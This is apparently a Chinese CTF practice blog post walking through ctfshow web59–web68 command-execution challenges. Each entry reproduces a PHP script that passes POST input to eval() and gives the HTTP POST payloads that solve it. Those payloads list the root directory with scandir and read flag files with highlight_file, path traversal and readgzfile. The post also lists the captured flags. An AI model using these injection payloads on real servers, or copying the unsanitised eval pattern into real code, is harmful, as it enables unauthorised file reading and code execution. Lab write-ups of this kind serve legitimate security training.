CTF-ctfshow_Web入门_命令执行4

题目来源：CTFshow

练习时间：2026年2月9日

练习数量：10

上篇博客链接：
CTF-ctfshow_Web入门_命令执行3

⭐️ 31 web59

🚩flag：ctfshow{68862ff0-59ce-4fd3-8025-deba7c1de8de}

💡hint：Web 命令执行（Command Injection） 过滤绕过

题目：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

同上题：

POST / HTTP/1.1
Host: 670b79e1-5123-49d3-9ddb-147ebdab84dc.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

c=highlight_file("flag.php");

---

⭐️ 32 web60

🚩flag：ctfshow{e7842818-6554-41e3-a0b8-5a7374694589}

💡hint：Web 命令执行（Command Injection） 过滤绕过

题目：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

为什么是一样的题目呢。。

同上题：

POST / HTTP/1.1
Host: 307815ed-8e14-4a52-9c4e-2e22ee0df4ac.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

c=highlight_file("flag.php");

---

⭐️ 33 web61

🚩flag：ctfshow{63bc8060-b842-4647-ad0f-a5df78ffda3f}

💡hint：Web 命令执行（Command Injection） 过滤绕过

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

为什么还是一样的题目呢。。

同上题：

POST / HTTP/1.1
Host: d6c9cfca-4090-43ff-b2ff-9f9ded19a20a.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

c=highlight_file("flag.php");

---

⭐️ 34 web62

🚩flag：ctfshow{3d9a3d94-8773-46d5-b07a-01ce93db4ea6}

💡hint：Web 命令执行（Command Injection） 过滤绕过

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

还还还是一样 没招了

同上题：

POST / HTTP/1.1
Host: 5b61b9c7-0ee7-469b-88f2-5e077b9510d4.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

c=highlight_file("flag.php");

---

⭐️ 35 web63

🚩flag：ctfshow{7dc51247-8dc6-4a60-9460-62ba0124f1bd}

💡hint：Web 命令执行（Command Injection） 过滤绕过

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

还还还是一样 没招了

同上题：

POST / HTTP/1.1
Host: 0e5680e6-6901-4d35-86f9-0f04abd20120.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

c=highlight_file("flag.php");

---

⭐️ 36 web64

🚩flag：ctfshow{0e297d1c-37ad-4482-8da1-dadfc684c479}

💡hint：Web 命令执行（Command Injection） 过滤绕过

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

还还还是一样 没招了

同上题：

POST / HTTP/1.1
Host: fbfe0ed6-8461-4b54-ab94-942a92dfe351.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

c=highlight_file("flag.php");

---

⭐️ 37 web65

🚩flag：ctfshow{39243ef1-5c4d-4876-b854-a15484bde24c}

💡hint：Web 命令执行（Command Injection） 过滤绕过

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

还还还是一样 没招了

同上题：

POST / HTTP/1.1
Host: b0dadf6b-55a7-45a4-a761-28f5f41f3e69.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

c=highlight_file("flag.php");

---

⭐️ 38 web66

🚩flag：ctfshow{2eb95fcc-f59f-411c-a64c-22495cec45a0}

💡hint：Web 命令执行（Command Injection） 过滤绕过

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

还还还是一样 没招了

同上题：

POST / HTTP/1.1
Host: cadaabf3-f83c-412a-97db-a9ec48dfddf6.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

c=highlight_file("flag.php");

好吧 这次不一样了。
先查看根目录内容：

c=print_r(scandir("/"));

得到：Array ( [0] => . [1] => .. [2] => .dockerenv [3] => bin [4] => dev [5] => etc [6] => flag.txt [7] => home [8] => lib [9] => media [10] => mnt [11] => opt [12] => proc [13] => root [14] => run [15] => sbin [16] => srv [17] => sys [18] => tmp [19] => usr [20] => var )

于是用查看根目录的：

c=highlight_file("../../../flag.txt");

---

⭐️ 39 web67

🚩flag：ctfshow{95b8ae7e-ca49-4290-bc3f-a6225c4e55c4}

💡hint：Web 命令执行（Command Injection） 过滤绕过

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

老规矩，先尝试：

POST / HTTP/1.1
Host: 121da562-a5ae-403b-9a8a-423801ca9c10.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

c=highlight_file("flag.php");

不在这里，然后尝试查看根目录内容
print_r被禁用了，尝试var_dump

POST / HTTP/1.1
Host: 121da562-a5ae-403b-9a8a-423801ca9c10.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

c=var_dump(scandir("/"));

还是得到：
array(21) { [0]=> string(1) “.” [1]=> string(2) “..” [2]=> string(10) “.dockerenv” [3]=> string(3) “bin” [4]=> string(3) “dev” [5]=> string(3) “etc” [6]=> string(8) “flag.txt” [7]=> string(4) “home” [8]=> string(3) “lib” [9]=> string(5) “media” [10]=> string(3) “mnt” [11]=> string(3) “opt” [12]=> string(4) “proc” [13]=> string(4) “root” [14]=> string(3) “run” [15]=> string(4) “sbin” [16]=> string(3) “srv” [17]=> string(3) “sys” [18]=> string(3) “tmp” [19]=> string(3) “usr” [20]=> string(3) “var” }

还是在一样的位置，用同样的命令就好了
c=highlight_file(“../../../flag.txt”);

---

⭐️ 40 web68

🚩flag：ctfshow{29a2f685-fdb5-48a6-b03b-2e918a13fc47}

💡hint：命令执行 POST

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

c=var_dump(scandir(“/“)); c=readgzfile(“/flag.txt”);

---

今日份结束🔚